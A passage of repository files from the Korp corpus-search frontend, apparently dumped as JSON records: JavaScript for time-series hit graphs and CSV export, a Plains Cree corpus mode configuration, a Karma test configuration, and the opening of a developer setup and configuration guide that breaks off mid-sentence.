this.$result).css({\n left,\n width,\n });\n }\n\n setZoom(zoom, from, to) {\n this.zoom = zoom;\n const fmt = `YYYYMMDDHHmmss`;\n\n this.drawPreloader(from, to);\n this.proxy.granularity = this.granularities[zoom];\n this.makeRequest(\n this.s.data.cqp,\n this.s.data.subcqps,\n this.s.data.corpusListing,\n this.s.data.labelMapping,\n this.s.data.showTotal,\n from.format(fmt),\n to.format(fmt),\n );\n }\n\n checkZoomLevel(from, to, forceSearch) {\n if (from == null) {\n const domain = this.graph.renderer.domain();\n from = moment.unix(domain.x[0]);\n to = moment.unix(domain.x[1]);\n }\n\n const oldZoom = this.zoom;\n\n const idealNumHits = 1000;\n const newZoom = _.minBy(this.validZoomLevels, function (zoom) {\n const nPoints = to.diff(from, zoom);\n return Math.abs(idealNumHits - nPoints);\n });\n\n if ((newZoom && oldZoom !== newZoom) || forceSearch) {\n this.setZoom(newZoom, from, to);\n }\n }\n\n parseDate(zoom, time) {\n switch (zoom) {\n case `year`:\n return moment(time, `YYYY`);\n case `month`:\n return moment(time, `YYYYMM`);\n case `day`:\n return moment(time, `YYYYMMDD`);\n case `hour`:\n return moment(time, `YYYYMMDDHH`);\n case `minute`:\n return moment(time, `YYYYMMDDHHmm`);\n case `second`:\n return moment(time, `YYYYMMDDHHmmss`);\n }\n }\n\n fillMissingDate(data) {\n const dateArray = _.map(data, `x`);\n const min = _.minBy(dateArray, (mom) => mom.toDate());\n const max = _.maxBy(dateArray, (mom) => mom.toDate());\n\n min.startOf(this.zoom);\n max.endOf(this.zoom);\n\n const n_diff = moment(max).diff(min, this.zoom);\n\n const momentMapping = _.fromPairs(\n _.map(data, (item) => {\n const mom = moment(item.x);\n mom.startOf(this.zoom);\n return [mom.unix(), item.y];\n }),\n );\n\n const newMoments = [];\n for (const i of _.range(0, n_diff + 1)) {\n var lastYVal;\n const newMoment = moment(min).add(i, this.zoom);\n\n const maybeCurrent = momentMapping[newMoment.unix()];\n if (typeof maybeCurrent !== `undefined`) {\n lastYVal = maybeCurrent;\n } else {\n newMoments.push({ x: newMoment, y: lastYVal });\n }\n }\n\n return [].concat(data, newMoments);\n }\n\n getSeriesData(data, showSelectedCorporasStartDate, zoom) {\n delete data[``];\n // TODO: getTimeInterval should take the corpora of this parent tab instead of the global ones.\n // const [firstVal, lastVal] = settings.corpusListing.getMomentInterval()\n let output = [];\n for (const [x, y] of _.toPairs(data)) {\n const mom = this.parseDate(this.zoom, x);\n output.push({ x: mom, y });\n }\n\n // if (not hasFirstValue) and showSelectedCorporasStartDate\n // if showSelectedCorporasStartDate # Don't remove first value for now\n // output.push {x : firstVal, y:0}\n\n // const prettyDate = item => moment(item.x).format(\"YYYYMMDD:HHmmss\")\n\n output = this.fillMissingDate(output);\n output = output.sort((a, b) => a.x.unix() - b.x.unix());\n\n for (const tuple of output) {\n tuple.x = tuple.x.unix();\n tuple.zoom = zoom;\n }\n\n return output;\n }\n\n hideNthTick(graphDiv) {\n return $(`.x_tick:visible`, graphDiv)\n .hide()\n .filter((n) => (n % 2 || n % 3 || n % 5) === 0)\n .show();\n }\n\n updateTicks() {\n const ticks = $(`.chart .title:visible`, this.$result);\n const firstTick = ticks.eq(0);\n const secondTick = ticks.eq(1);\n\n const margin = 5;\n\n if (!firstTick.length || !secondTick.length) {\n return;\n }\n if (firstTick.offset().left + firstTick.width() + margin > secondTick.offset().left) {\n this.hideNthTick($(`.chart`, this.$result));\n return this.updateTicks();\n }\n }\n\n getNonTime() {\n // TODO: move settings.corpusListing.selected to the subview\n const non_time = _.reduce(\n _.map(settings.corpusListing.selected, `non_time`),\n (a, b) => (a || 0) + (b || 0),\n 0,\n );\n const sizelist = _.map(settings.corpusListing.selected, (item) => Number(item.info.Size));\n const totalsize = _.reduce(sizelist, (a, b) => a + b);\n return (non_time / totalsize) * 100;\n }\n\n getEmptyIntervals(data) {\n const intervals = [];\n let i = 0;\n\n while (i < data.length) {\n let item = data[i];\n\n if (item.y === null) {\n const interval = [_.clone(item)];\n let breaker = true;\n while (breaker) {\n i++;\n item = data[i];\n if ((item != null ? item.y : undefined) === null) {\n interval.push(_.clone(item));\n } else {\n intervals.push(interval);\n breaker = false;\n }\n }\n }\n i++;\n }\n\n return intervals;\n }\n\n drawIntervals(graph) {\n const { emptyIntervals } = graph.series[0];\n this.s.hasEmptyIntervals = emptyIntervals.length;\n const obj = graph.renderer.domain();\n let [from, to] = obj.x;\n\n const unitSpan = moment.unix(to).diff(moment.unix(from), this.zoom);\n const unitWidth = graph.width / unitSpan;\n\n $(`.empty_area`, this.$result).remove();\n for (const list of emptyIntervals) {\n const max = _.maxBy(list, `x`);\n const min = _.minBy(list, `x`);\n from = graph.x(min.x);\n to = graph.x(max.x);\n\n $(`<div>`, { class: `empty_area` })\n .css({\n left: from - unitWidth / 2,\n width: to - from + unitWidth,\n })\n .appendTo(graph.element);\n }\n }\n\n setBarMode() {\n if ($(`.legend .line`, this.$result).length > 1) {\n $(`.legend li:last:not(.disabled) .action`, this.$result).click();\n if (\n _.every(_.map($(`.legend .line`, this.$result), (item) => $(item).is(`.disabled`)))\n ) {\n $(`.legend li:first .action`, this.$result).click();\n }\n }\n }\n\n setLineMode() {}\n\n setTableMode(series) {\n $(`.chart,.legend`, this.$result).hide();\n $(`.time_table`, this.$result.parent()).show();\n const nRows = series.length || 2;\n let h = nRows * 2 + 4;\n h = Math.min(h, 40);\n $(`.time_table:visible`, this.$result).height(`${h}.1em`);\n if (this.time_grid != null) {\n this.time_grid.resizeCanvas();\n }\n $(`.exportTimeStatsSection`, this.$result).show();\n\n return $(`.exportTimeStatsSection .btn.export`, this.$result).click(() => {\n const selVal = $(`.timeKindOfData option:selected`, this.$result).val();\n const selType = $(`.timeKindOfFormat option:selected`, this.$result).val();\n const dataDelimiter = selType === `TSV` ? `\\t` : `;`;\n\n const header = [util.getLocaleString(`stats_hit`)];\n\n for (const cell of series[0].data) {\n const stampformat = this.zoomLevelToFormat(cell.zoom);\n header.push(moment(cell.x * 1000).format(stampformat));\n }\n\n const output = [header];\n\n for (const row of series) {\n const cells = [row.name === `Σ` ? `Σ` : row.name];\n for (const cell of row.data) {\n if (selVal === `relative`) {\n cells.push(cell.y);\n } else {\n const i = _.sortedIndexOf(_.map(row.abs_data, `x`), cell.x);\n cells.push(row.abs_data[i].y);\n }\n }\n output.push(cells);\n }\n\n const csv = new CSV(output, {\n delimiter: dataDelimiter,\n });\n\n const csvstr = csv.encode();\n const blob = new Blob([csvstr], { type: `text/${selType}` });\n const csvUrl = URL.createObjectURL(blob);\n\n const a = document.createElement(`a`);\n a.href = csvUrl;\n a.download = `export.${selType}`;\n a.style.display = `none`;\n document.body.appendChild(a);\n a.click();\n document.body.removeChild(a);\n window.URL.revokeObjectURL(csvUrl);\n });\n }\n\n zoomLevelToFormat(zoom) {\n const stampFormats = {\n second: `YYYY-MM-DD hh:mm:ss`,\n minute: `YYYY-MM-DD hh:mm`,\n hour: `YYYY-MM-DD hh`,\n day: `YYYY-MM-DD`,\n month: `YYYY-MM`,\n year: `YYYY`,\n };\n return stampFormats[zoom];\n }\n\n renderTable(series) {\n const time_table_data = [];\n const time_table_columns_intermediate = {};\n for (const row of series) {\n const new_time_row = { label: row.name };\n for (const item of row.data) {\n const stampformat = this.zoomLevelToFormat(item.zoom);\n const timestamp = moment(item.x * 1000).format(stampformat); // this needs to be fixed for other resolutions\n time_table_columns_intermediate[timestamp] = {\n name: timestamp,\n field: timestamp,\n formatter(row, cell, value, columnDef, dataContext) {\n const loc = {\n sv: `sv-SE`,\n en: `gb-EN`,\n }[$(`body`).scope().lang];\n const fmt = function (valTup) {\n if (typeof valTup[0] === `undefined`) {\n return ``;\n }\n return (\n `<span>` +\n `<span class='relStat'>` +\n Number(valTup[1].toFixed(1)).toLocaleString(loc) +\n `</span> ` +\n `<span class='absStat'>(` +\n valTup[0].toLocaleString(loc) +\n `)</span> ` +\n `<span>`\n );\n };\n return fmt(value);\n },\n };\n const i = _.sortedIndexOf(_.map(row.abs_data, `x`), item.x);\n new_time_row[timestamp] = [item.y, row.abs_data[i].y];\n }\n time_table_data.push(new_time_row);\n }\n // Sort columns\n const time_table_columns = [\n {\n name: `Hit`,\n field: `label`,\n formatter(row, cell, value, columnDef, dataContext) {\n return value;\n },\n },\n ];\n for (const key of _.keys(time_table_columns_intermediate).sort()) {\n time_table_columns.push(time_table_columns_intermediate[key]);\n }\n\n const time_grid = new Slick.Grid(\n $(`.time_table`, this.$result),\n time_table_data,\n time_table_columns,\n {\n enableCellNavigation: false,\n enableColumnReorder: false,\n forceFitColumns: false,\n },\n );\n $(`.time_table`, this.$result).width(`100%`);\n this.time_grid = time_grid;\n }\n\n makeSeries(data, cqp, labelMapping, zoom) {\n let color, series;\n const [from, to] = CQP.getTimeInterval(CQP.parse(cqp)) || [null, null];\n const showSelectedCorporasStartDate = !from;\n if (_.isArray(data.combined)) {\n const palette = new Rickshaw.Color.Palette(`colorwheel`);\n series = [];\n for (const item of data.combined) {\n color = palette.color();\n series.push({\n data: this.getSeriesData(item.relative, showSelectedCorporasStartDate, zoom),\n color,\n name: item.cqp ? this.s.data.labelMapping[item.cqp] : `Σ`,\n cqp: item.cqp || cqp,\n abs_data: this.getSeriesData(\n item.absolute,\n showSelectedCorporasStartDate,\n zoom,\n ),\n });\n }\n } else {\n series = [\n {\n data: this.getSeriesData(\n data.combined.relative,\n showSelectedCorporasStartDate,\n zoom,\n ),\n color: `steelblue`,\n name: `Σ`,\n cqp,\n abs_data: this.getSeriesData(\n data.combined.absolute,\n showSelectedCorporasStartDate,\n zoom,\n ),\n },\n ];\n }\n Rickshaw.Series.zeroFill(series);\n\n const emptyIntervals = this.getEmptyIntervals(series[0].data);\n series[0].emptyIntervals = emptyIntervals;\n\n for (const s of series) {\n s.data = _.filter(s.data, (item) => item.y !== null);\n s.abs_data = _.filter(s.abs_data, (item) => item.y !== null);\n }\n\n return series;\n }\n\n spliceData(newSeries) {\n for (let seriesIndex = 0; seriesIndex < this.graph.series.length; seriesIndex++) {\n const seriesObj = this.graph.series[seriesIndex];\n const first = newSeries[seriesIndex].data[0].x;\n const last = _.last(newSeries[seriesIndex].data).x;\n let startSplice = false;\n let from = 0;\n let n_elems = seriesObj.data.length + newSeries[seriesIndex].data.length;\n for (let i = 0; i < seriesObj.data.length; i++) {\n var j;\n const { x } = seriesObj.data[i];\n if (x >= first && !startSplice) {\n startSplice = true;\n from = i;\n j = 0;\n }\n if (startSplice) {\n if (x >= last) {\n n_elems = j + 1;\n break;\n }\n j++;\n }\n }\n\n seriesObj.data.splice(from, n_elems, ...newSeries[seriesIndex].data);\n seriesObj.abs_data.splice(from, n_elems, ...newSeries[seriesIndex].abs_data);\n }\n }\n\n previewPanStop() {\n const visibleData = this.graph.stackData();\n\n const count = _.countBy(visibleData[0], (coor) => coor.zoom);\n\n const grouped = _.groupBy(visibleData[0], `zoom`);\n\n for (const zoomLevel in grouped) {\n const points = grouped[zoomLevel];\n if (zoomLevel !== this.zoom) {\n const from = moment.unix(points[0].x);\n from.startOf(this.zoom);\n const to = moment.unix(_.last(points).x);\n to.endOf(this.zoom);\n this.setZoom(this.zoom, from, to);\n }\n }\n }\n\n renderGraph(data, cqp, labelMapping, currentZoom, showTotal) {\n let series;\n\n const done = () => {\n this.hidePreloader();\n safeApply(this.s, () => {\n this.s.loading = false;\n });\n\n return $(window).trigger(`resize`);\n };\n\n if (data.ERROR) {\n this.resultError(data);\n return;\n }\n\n if (this.graph) {\n series = this.makeSeries(data, cqp, labelMapping, currentZoom);\n this.spliceData(series);\n this.drawIntervals(this.graph);\n this.graph.render();\n done();\n return;\n }\n\n const nontime = this.getNonTime();\n\n if (nontime) {\n $(`.non_time`, this.$result)\n .empty()\n .text(nontime.toFixed(2) + `%`)\n .parent()\n .localize();\n } else {\n $(`.non_time_div`, this.$result).hide();\n }\n\n series = this.makeSeries(data, cqp, labelMapping, currentZoom);\n\n const graph = new Rickshaw.Graph({\n element: $(`.chart`, this.$result).empty().get(0),\n renderer: `line`,\n interpolation: `linear`,\n series,\n padding: {\n top: 0.1,\n right: 0.01,\n },\n });\n let width = $(`.tab-pane`).width();\n graph.setSize({ width });\n graph.render();\n window._graph = this.graph = graph;\n\n this.drawIntervals(graph);\n\n $(window).on(\n `resize`,\n _.throttle(() => {\n if (this.$result.is(`:visible`)) {\n width = $(`.tab-pane`).width();\n graph.setSize();\n this.preview.configure({ width });\n this.preview.render();\n return graph.render();\n }\n }, 200),\n );\n\n $(`.form_switch`, this.$result).click((event) => {\n const val = this.s.mode;\n for (const cls of this.$result.attr(`class`).split(` `)) {\n if (cls.match(/^form-/)) {\n this.$result.removeClass(cls);\n }\n }\n this.$result.addClass(`form-${val}`);\n $(`.chart,.legend`, this.$result.parent()).show();\n $(`.time_table`, this.$result.parent()).hide();\n if (val === `bar`) {\n this.setBarMode();\n } else if (val === `table`) {\n this.renderTable(series);\n this.setTableMode(series);\n }\n\n if (val !== `table`) {\n graph.setRenderer(val);\n graph.render();\n $(`.exportTimeStatsSection`, this.$result).hide();\n }\n });\n\n const legend = new Rickshaw.Graph.Legend({\n element: $(`.legend`, this.$result).get(0),\n graph,\n });\n\n const shelving = new Rickshaw.Graph.Behavior.Series.Toggle({\n graph,\n legend,\n });\n\n if (!showTotal && $(`.legend .line`, this.$result).length > 1) {\n $(`.legend .line:last .action`, this.$result).click();\n }\n\n const hoverDetail = new Rickshaw.Graph.HoverDetail({\n graph,\n xFormatter: (x) => {\n const m = moment.unix(String(x));\n\n return `<span data-val='${x}'>${m.format(`YYYY-MM-DD HH:mm:ss`)}</span>`;\n },\n\n yFormatter(y) {\n const val = util.formatDecimalString(y.toFixed(2), false, true, true);\n\n return (\n `<br><span rel='localize[rel_hits_short]'>${util.getLocaleString(\n `rel_hits_short`,\n )}</span> ` + val\n );\n },\n formatter(series, x, y, formattedX, formattedY, d) {\n let abs_y;\n const i = _.sortedIndexOf(_.map(series.data, `x`), x);\n try {\n abs_y = series.abs_data[i].y;\n } catch (e) {\n c.log(`i`, i, x);\n }\n\n const rel = series.name + `: ` + formattedY;\n return `<span data-cqp=\"${encodeURIComponent(series.cqp)}\">\n ${rel}\n <br>\n ${util.getLocaleString(`abs_hits_short`)}: ${abs_y}\n </span>`;\n },\n });\n\n // [first, last] = settings.corpusListing.getTimeInterval()\n // [firstVal, lastVal] = settings.corpusListing.getMomentInterval()\n\n // TODO: fix decade again\n // timeunit = if last - first > 100 then \"decade\" else @zoom\n\n const toDate = (sec) => moment(sec * 1000).toDate();\n\n const time = new Rickshaw.Fixtures.Time();\n const old_ceil = time.ceil;\n time.ceil = (time, unit) => {\n if (unit.name === `decade`) {\n const out = Math.ceil(time / unit.seconds) * unit.seconds;\n const mom = moment(out * 1000);\n if (mom.date() === 31) {\n mom.add(`day`, 1);\n }\n return mom.unix();\n } else {\n return old_ceil(time, unit);\n }\n };\n\n const xAxis = new Rickshaw.Graph.Axis.Time({\n graph,\n });\n // timeUnit: time.unit(\"month\") # TODO: bring back decade\n // timeFixture: new Rickshaw.Fixtures.Time()\n\n this.preview = new Rickshaw.Graph.RangeSlider.Preview({\n graph,\n element: $(`.preview`, this.$result).get(0),\n });\n\n $(`body`).on(`mouseup`, `.preview .middle_handle`, () => {\n return this.previewPanStop();\n });\n\n $(`body`).on(`mouseup`, `.preview .left_handle, .preview .right_handle`, () => {\n if (!this.s.loading) {\n return this.previewPanStop();\n }\n });\n\n window._xaxis = xAxis;\n\n const old_render = xAxis.render;\n xAxis.render = _.throttle(\n () => {\n old_render.call(xAxis);\n this.drawIntervals(graph);\n return this.checkZoomLevel();\n },\n\n 20,\n );\n\n xAxis.render();\n\n const yAxis = new Rickshaw.Graph.Axis.Y({\n graph,\n });\n\n yAxis.render();\n\n done();\n }\n\n async makeRequest(cqp, subcqps, corpora, labelMapping, showTotal, from, to) {\n this.s.loading = true;\n if (!window.Rickshaw) {\n var rickshawPromise = import(/* webpackChunkName: \"rickshaw\" */ `rickshaw`);\n }\n this.showPreloader();\n const currentZoom = this.zoom;\n const reqPromise = this.proxy\n .makeRequest(cqp, subcqps, corpora.stringifySelected(), from, to)\n .progress((data) => {\n return this.onProgress(data);\n });\n\n try {\n var [rickshawModule, graphData] = await Promise.all([\n rickshawPromise || Rickshaw,\n reqPromise,\n ]);\n } catch (e) {\n c.error(`graph crash`, e);\n this.resultError(data);\n this.s.loading = false;\n }\n window.Rickshaw = rickshawModule;\n this.renderGraph(graphData, cqp, labelMapping, currentZoom, showTotal);\n }\n};\n"
},
{
"alpha_fraction": 0.6738197207450867,
"alphanum_fraction": 0.6762722134590149,
"avg_line_length": 33.70212936401367,
"blob_id": "68aba3b573b011800f34daf5c500247afc883bc3",
"content_id": "b8f66e58968196038dd20614066ace261d051b51",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1633,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 47,
"path": "/app/modes/default_mode.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "settings.corpora = {};\nsettings.corporafolders = {};\n\nsettings.corporafolders.crk = {\n // corpora included in this folder\n contents: [`wolfart_ahenakew`],\n // description for this folder\n // description: `A description,`\n // appears in the corpus selection dropdown for this folder\n title: `nêhiyawêwin (Plains Cree) texts`,\n};\n\n/*\n * PRESELECTED CORPORA\n * Folders will be expanded to all corpora.\n * Optionally prefix folders with __ , which will be ignored.\n */\nsettings.preselectedCorpora = [`wolfart_ahenakew`];\n\nsettings.corpora.wolfart_ahenakew = {\n\n id: `wolfart_ahenakew`,\n title: `Ahenakew-Wolfart Texts`, // displayed in info box under \"Corpus\"\n description: `Plains Cree texts compiled and edited by H. C. Wolfart and Freda Ahenakew`,\n within: spWithin, // from common.js; sp = sentence/paragraph\n context: spContext, // from common.js; sp = sentence/paragraph\n\n // attributes are displayed in the info box under \"Word attributes\"\n attributes: {\n dep: attrs.dep,\n gloss: attrs.gloss, // This may need to be specified some/elsewhere, as it is ALTLab-specific\n lemma: attrs.baseform,\n msd: attrs.msd,\n },\n\n // structural attributes are displayed in the info box under \"Text attributes\"\n structAttributes: {\n text_author: { label: `author` },\n text_lang: { label: `lang` },\n text_title: { label: `title` },\n text_title1: { label: `text_title1` }, // not sure why we have multiple titles [DWH]\n text_title2: { label: `text_title2` }, // not sure why we have multiple titles [DWH]\n },\n\n};\n\nsettings.corpusListing = new CorpusListing(settings.corpora);\n"
},
{
"alpha_fraction": 0.6199133992195129,
"alphanum_fraction": 0.6233766078948975,
"avg_line_length": 25.25,
"blob_id": "19d878a1b2a6f504c6d0c91b4875af6ca6ef4a9e",
"content_id": "6432e2cbad07651d23a1f47e81c6f446cf9460c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1155,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 44,
"path": "/test/karma/karma.conf.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "webpackConfig = require('../../webpack.common.js')\nwebpackConfig.mode = 'development'\nwebpackConfig.entry = {\n bundle: './test/karma/index.js'\n}\n\nmodule.exports = function(config) {\n config.set({\n // base path, that will be used to resolve files and exclude\n basePath: '../../',\n\n // testing framework to use (jasmine/mocha/qunit/...)\n frameworks: ['jasmine'],\n\n // list of files / patterns to exclude\n exclude: [],\n client: {\n captureConsole: true\n },\n // web server port\n port: 8080,\n reporters: ['progress'],\n colors: true,\n // possible values: LOG_DISABLE || LOG_ERROR || LOG_WARN || LOG_INFO || LOG_DEBUG\n logLevel: config.LOG_DEBUG,\n files: [\n { pattern: 'test/karma/spec/*.js', watched: false }\n ],\n preprocessors: {\n 'test/karma/spec/*.js': [ 'webpack' ]\n },\n webpack: webpackConfig,\n\n // enable / disable watching file and executing tests whenever any file changes\n autoWatch: false,\n\n browsers: ['ChromeHeadless'],\n concurrency: Infinity,\n\n // Continuous Integration mode\n // if true, it capture browsers, run tests and exit\n singleRun: true\n });\n}\n"
},
{
"alpha_fraction": 0.7117212414741516,
"alphanum_fraction": 0.7149211168289185,
"avg_line_length": 52.32935333251953,
"blob_id": "74ed605d954c0c41a13e1e5625d224f9d538d224",
"content_id": "c112a291f6fdf7a8ed1147dbae49b66bef54e47b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 31257,
"license_type": "permissive",
"max_line_length": 662,
"num_lines": 586,
"path": "/doc/frontend_devel.md",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "# Setting up the Korp Frontend\n\nThis section describes how to get the Korp frontend up and running on your own machine and presents the available customization. In this step it is necessary to have a backend with at least one corpus installed. For testing purposes, Språkbankens Korp backend may be enough. It is also assumed that you have a web server available (such as Apache or Nginx).\n\nDownload the latest release from [Github](https://github.com/spraakbanken/korp-frontend/releases). The code is distributed under the [MIT license][MIT].\n\nAn alternative to downloading a released bundle is to clone the repository:\n\n```\ngit clone https://github.com/spraakbanken/korp-frontend.git\n```\n\nBe sure to use the `main`-branch for production environments.\n\nIn this text Korp refers to the frontend only.\n\n## Configuration\n\nIn ideal cases, no changes needs to be done in Korp. Instead\nall configuration will reside in another directory. How to make the build\nsystem detect this directory and its contents will be described below.\n\n### Make Korp detect the configuration directory\n\nTo make Korp detect the configuration directory,\nuse a `run_config.json` file in the root of the Korp repo with the following content:\n\n```\n{\n \"configDir\": \"../path/to/my/configuration/folder\"\n}\n```\n\n### Structure of the configuration directory\n\nThe following type of files are needed to make Korp work properly. They\nare all described in the documentation.\n\n- `config.js`\n- `modes/common.js`\n- `modes/*mode.js`\n- `translations/*.json`\n\n(In short, a mode is a collection of corpora that may have different\n functionality and are described later).\n\nFor more advanced use cases there is also the possibility to add scripts,\n styling and HTML-templates/snippets.\n\n - `styles/`\n - `scripts/`\n - `views/`\n\n Styles and scripts will be automatically loaded.\n Files matching `views/*.html` can be loaded manually by requiring them\n using the name `customtemplates`. The result will be a string containing\n the (minified) HTML, for example, a template for an Angular\n directive: `template: require(\"customviews/my_view.html\")`. If you are not\n writing any custom scripts (i.e. files in `scripts/`), this can be\n completely ignored.\n\n### Content of `config.js`\n\nThe main configuration file of Korp is `config.js`. In this file we have\nconfiguration for where the backend is located, what features should be turned\non or off etc. Corpora configuration is done in the modes files. There is more\ninformation about that later in this document.\n\nAll configuration parameters are added to a global `settings`-object. For example:\n\n```\nsettings.defaultLanguage = \"en\"\n```\n\nAvailable settings will be described in feature sections and there is also a\n[summary of all settings](#summary-settings). A good start could be to just\ncopy `config.js` from this repository to your configuration directory.\n\n### Content of `modes/common.js`\n\nAfter `config.js`, but before any mode configuration, `modes/common.js` is\nloaded. This may include definitions which are used in several modes s.a. a set\nof attributes. This helps to keep `config.js` clean. This file must export any\nvariables that can be used in a mode.\n\n```\nvar veryCommonAttributes = {\n pos: {\n label: \"pos\",\n order: 600\n }\n}\nmodule.exports = {\n veryCommonAttributes\n}\n```\n\nNow very `veryCommonAttributes` will be available in all mode-files.\n\n### Localization\n\nIn `app/translations` there are several files containing translations for\ndifferent parts of the application.\n\nFiles prefixed with `locale` and controls translations are hard-coded into the\napplication and thus it should not be necessary to change these if only\ncustomization is done. The files prefixed with `corpora` however are\ntranslations of corpora attributes and values and must be replaced with data\nsuitable for the specific set of corpora the Korp installation serves. The\nfiles are JSON structures that for each language ties a __translation key__\nto a particular __string__ in that language. You should start with empty corpora\ntranslation files and then add the translations as you add corpora.\n\nThe translations folder also contains Python script - `check_locale_files.py` -\nthat makes sure that each set of translation files has each translation key\npresent in all different languages.\n\n#### Adding Languages\n\nTo add a new language in the frontend, for example Lithuanian, add a `corpora-lt.json` and `locale-lt.json`. `locale-lt.json` may be copied from an existing locale-file and then translated. Then add the language in `config.js`:\n\n `settings.languages = [\"sv\", \"en\", \"lt\"];`\n\nTo make Lithuanian the default language, use:\n\n `settings.defaultLanguage = \"lt\"`\n\nTo add a button in the interface for Lithuanian, open\n`includes/header.pug` and look for:\n\n```\na(data-mode='en', ng-click=\"lang = 'en'\") {{'english' | loc:lang}}\n```\n\nand copy this line, substituting `en` for `lt`\nwhere applicable.\n\n##### Angular.js locale\n\nTo enable full localization (dates in a datepicker for example), an extra file\nis necessary. Download `angular-locale_lt.js` from here:\n\n[Angular i18n][angular-i18n]\n\nPut the file in `app/translations/`.\n\n## Modes\n\nEach Korp installation has a series of _Modes_ in the top left corner, which\nare useful for presenting different faces of Korp that might have different\nlayouts or functionality. In the Swedish version the parallel corpora have their\nown mode because their KWIC results don't mix particularly well with the\n'normal' results.\n\n#### Adding modes\n\nRelevant setting fields are `settings.visibleModes` and `settings.modeConfig`. The former controls how many modes are visible in the header (the rest are hidden away in a menu). The latter looks like this:\n\n [\n {\n localekey: \"modern_texts\",\n mode: \"default\"\n },\n {\n localekey: \"parallel_texts\",\n mode: \"parallel\"\n },\n {\n localekey: \"faroese_texts\",\n mode: \"faroe\"\n }\n ]\n\n\nThe `localeKey` key corresponds to a key from the localization files. The `mode` key is the mode identifier and is used to load a script file from the `modes` folder, in\nthe configuration directory, corresponding to that ID. So if you click the modeSelectors 'parallel' entry, the page refreshes and the `modes/parallel_mode.js` will be loaded.\n\nThe mode called `default` will always be loaded first. If there is no need for more than one mode, leave `settings.modeConfig` empty.\n\n## Corpora\nThe config file contains the corpora declaration, wherein the available corpora are declared together with information about which metadata fields are searchable in them. Adding a test corpus is as simple as:\n\n\n settings.corpora = {};\n settings.corpora[\"testcorpus\"] = {\n id: \"testcorpus\",\n title: \"The Korp Test Corpus\",\n description: \"A test corpus for testing Korp.\",\n within: {\"sentence\": \"sentence\"},\n attributes: {\n pos: {\n label: \"pos\",\n opts: {\n \"is\": \"=\",\n \"is_not\": \"!=\"\n }\n }\n },\n structAttributes: {\n }\n }\n\n* `id`: Short form title, should correspond to the key name of the definition.\n* `title`: Long form title, for display in the corpus chooser.\n* `description`: For display in the corpus chooser.\n* `within`: What are the structural elements of the corpus? See `defaultWithin` in [settings summary](#summary-settings) for format and more information.\n* `attributes`: each key here refers to a word attribute in Corpus Workbench. Their values are JSON structures with a few attributes of their own; they are concerned with generating the necessary interface widgets in Extended Search, display in sidebar and statistics. They are:\n * `label`: a translation key for the attributes name\n * `limitedAccess`: `boolean`, it will not be possible to select this corpus unless a user is logged in and has the correct credentials.\n * `displayType`: set to `'hidden'` to fetch attribute, but never show it in the frontend. See `hideSidebar`, `hideStatistics`, `hideExtended` and `hideCompare` for more control.\n * `translationKey`: you can declare a prefix for the translation keys of the dataset here. This is so the corpora translation file doesn't get too messy: a simple kind of namespacing.\n * `extendedTemplate`: Angular template used in conjunction with the `extendedController` to generate an interface widget for this attribute. See <#ref customizing-extended-search|customizing extended search>.\n * `extendedController`: Angular controller that is applied to the template. See <#ref customizing-extended-search|customizing extended search>.\n * `opts`: this represents the auxiliary select box where you can modify the input value. See `defaultOptions` in [settings summary](#summary-settings) for format and more information.\n * `hideSidebar`: Default `false`. Hide attribute in sidebar.\n * `hideStatistics`: Default: `false`. Should it be possible to compile statistics based on this attribute?\n * `hideExtended`: Default: `false`. Should it be possible to search using this attribute in extended?\n * `hideCompare`: Default: `false`. Should it be possible to compare searches using this attribute?\n * `type`: Possible values:\n - \"set\" - The attribute is formatted as \"|value1|value2|\". Include contains and not contains in `opts`.\n In the sidebar, the value will be split before formatted. When using compile / `groupby` on a \"set\" attribute in a statistics request, it will be added to `split`.\n - \"url\" - The value will be rendered as a link to the URL and possibly truncated if too long.\n * `pattern`: HTML snippet with placeholders for replacing values. Available is `key` (attribute name) and `value`. Also works for sets. Example: `'<p style=\"margin-left: 5px;\"><%=val.toLowerCase()%></p>'`\n * `display`: How to display attribute in sidebar. Currently only supported for sets and `expandList` (see below). In the future more ways to display might be added here.\n * `expandList`: Render set as a list where the first element is visible and a button to show or hide the rest of the elements.\n * `splitValue`: Function to split up values if there are sets within the set. Example: `function(value) { return value.split(','); }`\n * `searchKey`: If `display.expandList.internalSearch` is set to `true`, links will be rendered to search for the value in Korp, using this key in the CQP-expression.\n Omit to use same key as attribute name.\n * `joinValues`: Interleave this string with all values on the row.\n * `stringify`: Optional override of outer `stringify`.\n * `linkAllValues`: Should the `internalSearch` be enabled for all values or only the first one in the set?\n * `internalSearch`: Alternative function to transform the attribute key and value to a CQP-expression.\n Example: `function(key,value) { '[' + key + '=\"' + val + '\"]' }`\n * `sidebarComponent`: If the `display` key above doesn't do enough, you can write a custom interactive component using `sidebarComponent.template` (an Angularjs template string) and `sidebarComponent.controller` (an Angularjs controller function). Useful for having e.g. a modal window pop up, or for rendering a small video player in the sidebar, or for anything else that isn't simple text or a link. `$scope.model` holds the value, so assigning to this variable will change the current CQP expression. See the `complemgram` and `compwf` implementation at the [Korp SB Config](https://github.com/spraakbanken/korp-frontend-sb/blob/dev/app/modes/common.js).\n * `internalSearch`: `boolean`. Should the value be displayed as a link to a new Korp search? Only works for sets. Searches for CQP-expression: `[<attrName> contains \"<regescape(attrValue)>\"]`\n * `externalSearch`: Link with placeholder for replacing value. Example `https://spraakbanken.gu.se/karp/#?search=extended||and|sense|equals|<%= val %>`\n * `order`: Order of attribute in the sidebar. Attributes with a lower `order`-value will be placed over attributes with a higher `order`-value.\n * `stringify`: How to pretty-print the attribute in the context of the sidebar. Example: `function(str) { return util.lemgramToString(str, true); }`\n * `stats_stringify`: How to pretty-print the attribute in the context of the statistics table. The provided formatting function will be passed an array of labels. Example: `stats_stringify: function(values) {return values.join(\" \")}`.\n * `stats_cqp`: How to create a cqp query when clicking a value in the statistics table. The provided formatting function will be passed an array of labels. Example: ```stats_cqp: function(values) {return 